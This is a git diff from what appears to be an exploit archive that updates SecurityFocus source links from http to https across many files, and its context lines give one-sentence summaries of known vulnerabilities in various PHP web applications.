a/exploits/php/webapps/29968.txt +++ b/exploits/php/webapps/29968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29969.txt b/exploits/php/webapps/29969.txt index 0fa72650d..d33a080f2 100644 --- a/exploits/php/webapps/29969.txt +++ b/exploits/php/webapps/29969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29970.txt b/exploits/php/webapps/29970.txt index d8ce298a0..48800ca97 100644 --- a/exploits/php/webapps/29970.txt +++ b/exploits/php/webapps/29970.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29971.txt b/exploits/php/webapps/29971.txt index f95eeda99..176a332a1 100644 --- a/exploits/php/webapps/29971.txt +++ b/exploits/php/webapps/29971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29972.txt b/exploits/php/webapps/29972.txt index 34189850d..e0499ee3c 100644 --- a/exploits/php/webapps/29972.txt +++ b/exploits/php/webapps/29972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29973.txt b/exploits/php/webapps/29973.txt index 8566dd558..a20e6a3b1 100644 --- a/exploits/php/webapps/29973.txt +++ b/exploits/php/webapps/29973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29974.txt b/exploits/php/webapps/29974.txt index 6fe28b9d9..f3f7790e5 100644 --- a/exploits/php/webapps/29974.txt +++ b/exploits/php/webapps/29974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29975.txt b/exploits/php/webapps/29975.txt index 739430cb8..55fef622e 100644 --- a/exploits/php/webapps/29975.txt +++ b/exploits/php/webapps/29975.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29976.txt b/exploits/php/webapps/29976.txt index 53a0a0dd2..3115a99a9 100644 --- a/exploits/php/webapps/29976.txt +++ b/exploits/php/webapps/29976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29977.txt b/exploits/php/webapps/29977.txt index f6944727e..230c445b8 100644 --- a/exploits/php/webapps/29977.txt +++ b/exploits/php/webapps/29977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29978.txt b/exploits/php/webapps/29978.txt index 1b8257b0a..dfb6e087b 100644 --- a/exploits/php/webapps/29978.txt +++ b/exploits/php/webapps/29978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29979.txt b/exploits/php/webapps/29979.txt index ee7c50f80..de392ac3c 100644 --- a/exploits/php/webapps/29979.txt +++ b/exploits/php/webapps/29979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29980.txt b/exploits/php/webapps/29980.txt index ea852b0f1..d10ba8b16 100644 --- a/exploits/php/webapps/29980.txt +++ b/exploits/php/webapps/29980.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29981.txt b/exploits/php/webapps/29981.txt index f5e949008..7994ff24a 100644 --- a/exploits/php/webapps/29981.txt +++ b/exploits/php/webapps/29981.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29982.txt b/exploits/php/webapps/29982.txt index e3fc898c9..09952b664 100644 --- a/exploits/php/webapps/29982.txt +++ b/exploits/php/webapps/29982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29983.txt b/exploits/php/webapps/29983.txt index 67aa10992..ec87a68a4 100644 --- a/exploits/php/webapps/29983.txt +++ b/exploits/php/webapps/29983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29984.txt b/exploits/php/webapps/29984.txt index 4f243f8f1..ca9e4fe39 100644 --- a/exploits/php/webapps/29984.txt +++ b/exploits/php/webapps/29984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29985.txt b/exploits/php/webapps/29985.txt index cde0eb123..0db58ad43 100644 --- a/exploits/php/webapps/29985.txt +++ b/exploits/php/webapps/29985.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29986.txt b/exploits/php/webapps/29986.txt index 5a55ada5d..60e33b592 100644 --- a/exploits/php/webapps/29986.txt +++ b/exploits/php/webapps/29986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29987.txt b/exploits/php/webapps/29987.txt index 2e806cafe..2fb823ab7 100644 --- a/exploits/php/webapps/29987.txt +++ b/exploits/php/webapps/29987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29988.txt b/exploits/php/webapps/29988.txt index 1742c4003..2444a11a0 100644 --- a/exploits/php/webapps/29988.txt +++ b/exploits/php/webapps/29988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29989.txt b/exploits/php/webapps/29989.txt index 930f17ff9..a9ce0a59b 100644 --- a/exploits/php/webapps/29989.txt +++ b/exploits/php/webapps/29989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29990.txt b/exploits/php/webapps/29990.txt index 49210e9b2..6197f0b4b 100644 --- a/exploits/php/webapps/29990.txt +++ b/exploits/php/webapps/29990.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29991.txt b/exploits/php/webapps/29991.txt index 164430a80..88dcdc356 100644 --- a/exploits/php/webapps/29991.txt +++ b/exploits/php/webapps/29991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29992.txt b/exploits/php/webapps/29992.txt index 69d0ab28f..ad122fecb 100644 --- a/exploits/php/webapps/29992.txt +++ b/exploits/php/webapps/29992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29993.txt b/exploits/php/webapps/29993.txt index 96e79d9cb..bfac5c4e9 100644 --- a/exploits/php/webapps/29993.txt +++ b/exploits/php/webapps/29993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29994.txt b/exploits/php/webapps/29994.txt index 7893dc71c..de302b981 100644 --- a/exploits/php/webapps/29994.txt +++ b/exploits/php/webapps/29994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29995.txt b/exploits/php/webapps/29995.txt index d08d0ef05..5ed697e65 100644 --- a/exploits/php/webapps/29995.txt +++ b/exploits/php/webapps/29995.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29996.txt b/exploits/php/webapps/29996.txt index 7582d6c54..59e031241 100644 --- a/exploits/php/webapps/29996.txt +++ b/exploits/php/webapps/29996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29997.txt b/exploits/php/webapps/29997.txt index c1e1b3793..c89d895b1 100644 --- a/exploits/php/webapps/29997.txt +++ b/exploits/php/webapps/29997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29998.txt b/exploits/php/webapps/29998.txt index a302fb5d2..cd8ba5b10 100644 --- a/exploits/php/webapps/29998.txt +++ b/exploits/php/webapps/29998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29999.txt b/exploits/php/webapps/29999.txt index b3b1c7c76..17ad4ac8c 100644 --- a/exploits/php/webapps/29999.txt +++ b/exploits/php/webapps/29999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30003.txt b/exploits/php/webapps/30003.txt index d9ef06c5e..e07fb6293 100644 --- a/exploits/php/webapps/30003.txt +++ b/exploits/php/webapps/30003.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30004.txt b/exploits/php/webapps/30004.txt index 9933c937a..ee62ea38b 100644 --- a/exploits/php/webapps/30004.txt +++ b/exploits/php/webapps/30004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30005.txt b/exploits/php/webapps/30005.txt index 7f1f8ae7b..1310d450b 100644 --- a/exploits/php/webapps/30005.txt +++ b/exploits/php/webapps/30005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30006.txt b/exploits/php/webapps/30006.txt index 90034fcd4..08f011906 100644 --- a/exploits/php/webapps/30006.txt +++ b/exploits/php/webapps/30006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30015.txt b/exploits/php/webapps/30015.txt index eff46c57d..2cebb60fd 100644 --- a/exploits/php/webapps/30015.txt +++ b/exploits/php/webapps/30015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23876/info +source: https://www.securityfocus.com/bid/23876/info Advanced Guestbook is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30022.txt b/exploits/php/webapps/30022.txt index 2c5ead203..e2150319a 100644 --- a/exploits/php/webapps/30022.txt +++ b/exploits/php/webapps/30022.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23917/info +source: https://www.securityfocus.com/bid/23917/info PHP Multi User Randomizer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30027.txt b/exploits/php/webapps/30027.txt index 1d523b45f..9156b8aaf 100644 --- a/exploits/php/webapps/30027.txt +++ b/exploits/php/webapps/30027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23950/info +source: https://www.securityfocus.com/bid/23950/info CommuniGate Pro is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30028.txt b/exploits/php/webapps/30028.txt index 650055539..c24f9a9dd 100644 --- a/exploits/php/webapps/30028.txt +++ b/exploits/php/webapps/30028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23951/info +source: https://www.securityfocus.com/bid/23951/info EQDKP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30029.txt b/exploits/php/webapps/30029.txt index 534e4ab49..3273ca238 100644 --- a/exploits/php/webapps/30029.txt +++ b/exploits/php/webapps/30029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23963/info +source: https://www.securityfocus.com/bid/23963/info SonicBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30035.txt b/exploits/php/webapps/30035.txt index 32b844707..3c3713c22 100644 --- a/exploits/php/webapps/30035.txt +++ b/exploits/php/webapps/30035.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23964/info +source: https://www.securityfocus.com/bid/23964/info SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30036.html b/exploits/php/webapps/30036.html index de8c10641..f0df4e0f1 100644 --- a/exploits/php/webapps/30036.html +++ b/exploits/php/webapps/30036.html @@ -1,4 +1,4 @@ - diff --git a/exploits/php/webapps/30040.txt b/exploits/php/webapps/30040.txt index 795411258..111d387c0 100644 --- a/exploits/php/webapps/30040.txt +++ b/exploits/php/webapps/30040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23989/info +source: https://www.securityfocus.com/bid/23989/info Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input. diff --git a/exploits/php/webapps/30041.txt b/exploits/php/webapps/30041.txt index 4cb7308e2..c266ec2d3 100644 --- a/exploits/php/webapps/30041.txt +++ b/exploits/php/webapps/30041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23999/info +source: https://www.securityfocus.com/bid/23999/info Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30042.txt b/exploits/php/webapps/30042.txt index 53c5f31e8..57737a2e3 100644 --- a/exploits/php/webapps/30042.txt +++ b/exploits/php/webapps/30042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23999/info +source: https://www.securityfocus.com/bid/23999/info Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30047.txt b/exploits/php/webapps/30047.txt index 993767ddb..e32d74c49 100644 --- a/exploits/php/webapps/30047.txt +++ b/exploits/php/webapps/30047.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24020/info +source: https://www.securityfocus.com/bid/24020/info vBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30050.html b/exploits/php/webapps/30050.html index 4331cef74..8f643370e 100644 --- a/exploits/php/webapps/30050.html +++ b/exploits/php/webapps/30050.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24037/info +source: https://www.securityfocus.com/bid/24037/info Redoable is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30051.txt b/exploits/php/webapps/30051.txt index 97beb424b..6daa2339a 100644 --- a/exploits/php/webapps/30051.txt +++ b/exploits/php/webapps/30051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24039/info +source: https://www.securityfocus.com/bid/24039/info PsychoStats is prone to a path-disclosure issue when invalid data is submitted. diff --git a/exploits/php/webapps/30053.txt b/exploits/php/webapps/30053.txt index f2a63a14b..e11e1228a 100644 --- a/exploits/php/webapps/30053.txt +++ b/exploits/php/webapps/30053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24061/info +source: https://www.securityfocus.com/bid/24061/info ClientExec is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30064.txt b/exploits/php/webapps/30064.txt index 2b4430ae1..b0a33b49c 100644 --- a/exploits/php/webapps/30064.txt +++ b/exploits/php/webapps/30064.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24063/info +source: https://www.securityfocus.com/bid/24063/info HLstats is prone to mulitiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30065.html b/exploits/php/webapps/30065.html index 38cc908d7..41c80bd09 100644 --- a/exploits/php/webapps/30065.html +++ b/exploits/php/webapps/30065.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24066/info +source: https://www.securityfocus.com/bid/24066/info GaliX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30066.txt b/exploits/php/webapps/30066.txt index b6de4283a..c6c3b90d9 100644 --- a/exploits/php/webapps/30066.txt +++ b/exploits/php/webapps/30066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24077/info +source: https://www.securityfocus.com/bid/24077/info Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30068.txt b/exploits/php/webapps/30068.txt index 3d7fdb2c8..e9cf54075 100644 --- a/exploits/php/webapps/30068.txt +++ b/exploits/php/webapps/30068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24095/info +source: https://www.securityfocus.com/bid/24095/info Jetbox CMS is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30070.html b/exploits/php/webapps/30070.html index 4f6f36e58..de772c300 100644 --- a/exploits/php/webapps/30070.html +++ b/exploits/php/webapps/30070.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24101/info +source: https://www.securityfocus.com/bid/24101/info ClonusWiki is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30071.txt b/exploits/php/webapps/30071.txt index 30e93805d..6a7f8149f 100644 --- a/exploits/php/webapps/30071.txt +++ b/exploits/php/webapps/30071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24103/info +source: https://www.securityfocus.com/bid/24103/info ABC Excel Parser Pro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30073.txt b/exploits/php/webapps/30073.txt index bd3836a6f..6157fbb82 100644 --- a/exploits/php/webapps/30073.txt +++ b/exploits/php/webapps/30073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24108/info +source: https://www.securityfocus.com/bid/24108/info GMTT Music Distro is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30075.txt b/exploits/php/webapps/30075.txt index 4f66758bf..62f25fc0d 100644 --- a/exploits/php/webapps/30075.txt +++ b/exploits/php/webapps/30075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24115/info +source: https://www.securityfocus.com/bid/24115/info phpPgAdmin is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30076.txt b/exploits/php/webapps/30076.txt index 3f26a470a..38c00f276 100644 --- a/exploits/php/webapps/30076.txt +++ b/exploits/php/webapps/30076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24117/info +source: https://www.securityfocus.com/bid/24117/info WÝYS is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30079.txt b/exploits/php/webapps/30079.txt index b57fcf416..8b7ea79c7 100644 --- a/exploits/php/webapps/30079.txt 
+++ b/exploits/php/webapps/30079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24122/info +source: https://www.securityfocus.com/bid/24122/info 2z Project is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30081.txt b/exploits/php/webapps/30081.txt index 800579deb..3c060f2e7 100644 --- a/exploits/php/webapps/30081.txt +++ b/exploits/php/webapps/30081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24135/info +source: https://www.securityfocus.com/bid/24135/info ASP-Nuke is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30082.txt b/exploits/php/webapps/30082.txt index d969aa69f..f2916a14a 100644 --- a/exploits/php/webapps/30082.txt +++ b/exploits/php/webapps/30082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24152/info +source: https://www.securityfocus.com/bid/24152/info Gnuturk is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30086.txt b/exploits/php/webapps/30086.txt index 0faf2d5f9..b12571db1 100644 --- a/exploits/php/webapps/30086.txt +++ b/exploits/php/webapps/30086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24156/info +source: https://www.securityfocus.com/bid/24156/info BoastMachine is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30087.txt b/exploits/php/webapps/30087.txt index 7d858d895..e8904d089 100644 --- a/exploits/php/webapps/30087.txt +++ b/exploits/php/webapps/30087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24157/info +source: https://www.securityfocus.com/bid/24157/info Digirez is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30088.txt b/exploits/php/webapps/30088.txt index ef6ea7b8f..f79a09dbc 100644 --- a/exploits/php/webapps/30088.txt +++ b/exploits/php/webapps/30088.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24158/info +source: https://www.securityfocus.com/bid/24158/info Pligg is prone to a security-bypass vulnerability due to a design error when resetting forgotten passwords. diff --git a/exploits/php/webapps/30090.txt b/exploits/php/webapps/30090.txt index 53692d5ad..09254ad27 100644 --- a/exploits/php/webapps/30090.txt +++ b/exploits/php/webapps/30090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24182/info +source: https://www.securityfocus.com/bid/24182/info phpPgAdmin is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30092.txt b/exploits/php/webapps/30092.txt index 89924fca4..50edbb6e0 100644 --- a/exploits/php/webapps/30092.txt +++ b/exploits/php/webapps/30092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24190/info +source: https://www.securityfocus.com/bid/24190/info FlashChat is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/30094.txt b/exploits/php/webapps/30094.txt index ea1b3eec5..bc2fef84b 100644 --- a/exploits/php/webapps/30094.txt +++ b/exploits/php/webapps/30094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24200/info +source: https://www.securityfocus.com/bid/24200/info DGNews is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/30095.txt b/exploits/php/webapps/30095.txt index 49f56a9c8..458a6eaa5 100644 --- a/exploits/php/webapps/30095.txt +++ b/exploits/php/webapps/30095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24201/info +source: https://www.securityfocus.com/bid/24201/info DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30097.txt b/exploits/php/webapps/30097.txt index 40a5fd75f..5abbb083d 100644 
--- a/exploits/php/webapps/30097.txt +++ b/exploits/php/webapps/30097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24210/info +source: https://www.securityfocus.com/bid/24210/info Uebimiau is prone to multiple input-validation vulnerabilities, including cross-site scripting issues and an information-disclosure issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30098.txt b/exploits/php/webapps/30098.txt index 2afb18d93..93762be14 100644 --- a/exploits/php/webapps/30098.txt +++ b/exploits/php/webapps/30098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24210/info +source: https://www.securityfocus.com/bid/24210/info Uebimiau is prone to multiple input-validation vulnerabilities, including cross-site scripting issues and an information-disclosure issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30099.txt b/exploits/php/webapps/30099.txt index 1c4839e83..6ae50cea5 100644 --- a/exploits/php/webapps/30099.txt +++ b/exploits/php/webapps/30099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24212/info +source: https://www.securityfocus.com/bid/24212/info DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30101.txt b/exploits/php/webapps/30101.txt index 9ec88f5c8..1f313daa4 100644 --- a/exploits/php/webapps/30101.txt +++ b/exploits/php/webapps/30101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24223/info +source: https://www.securityfocus.com/bid/24223/info cpCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30102.php b/exploits/php/webapps/30102.php index eb26de214..a76a38884 100644 --- a/exploits/php/webapps/30102.php 
+++ b/exploits/php/webapps/30102.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24227/info +source: https://www.securityfocus.com/bid/24227/info Pheap is prone to an authentication-bypass vulnerability due to a design error. diff --git a/exploits/php/webapps/30103.txt b/exploits/php/webapps/30103.txt index 33df8e33d..ab8a248a7 100644 --- a/exploits/php/webapps/30103.txt +++ b/exploits/php/webapps/30103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24232/info +source: https://www.securityfocus.com/bid/24232/info Particle Blogger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30109.txt b/exploits/php/webapps/30109.txt index 0969c9ed6..2352b01d1 100644 --- a/exploits/php/webapps/30109.txt +++ b/exploits/php/webapps/30109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24236/info +source: https://www.securityfocus.com/bid/24236/info Particle Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30111.txt b/exploits/php/webapps/30111.txt index f79cdb459..81973eea4 100644 --- a/exploits/php/webapps/30111.txt +++ b/exploits/php/webapps/30111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24249/info +source: https://www.securityfocus.com/bid/24249/info myBloggie is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/30112.txt b/exploits/php/webapps/30112.txt index ed09c2046..9e58076b0 100644 --- a/exploits/php/webapps/30112.txt +++ b/exploits/php/webapps/30112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24253/info +source: https://www.securityfocus.com/bid/24253/info PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. 
